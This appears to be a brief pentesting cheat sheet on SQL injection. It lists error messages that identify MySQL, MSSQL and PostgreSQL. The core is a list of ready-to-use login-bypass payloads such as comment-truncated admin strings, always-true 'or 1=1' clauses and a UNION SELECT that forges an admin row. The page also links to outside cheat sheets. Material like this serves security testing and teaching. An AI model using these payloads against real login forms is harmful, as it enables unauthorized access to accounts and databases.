Link
  1. General info
  2. Injection (SQLi)
    1. Easy Injection Tests (aka Login Tricks)
    2. Automatic scanning with SQLMap
  3. Resources / More info
    1. Links
      1. Cheatsheets and more
      2. Good reads

General info

There are four common database types: (each one will report errors in different ways)

  1. MySQL
    • error example: The used SELECT statements have a different number of columns
  2. MSSQL
    • error example: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
  3. Oracle
    • error example:
  4. Postgre-SQL
    • error example: Each UNION query must have the same number of columns

Injection (SQLi)

Easy Injection Tests (aka Login Tricks)

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1-- -
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • 'UNION SELECT 1, 'admin', 'password', 1--

Automatic scanning with SQLMap


Resources / More info

SQL Injection Hacking Tools

Cheatsheets and more

SQLi Cheat Sheet - netsparker
SQLi Cheat Sheet - pentestmonkey

Good reads

MSSQL Injection PWNage Drupageddon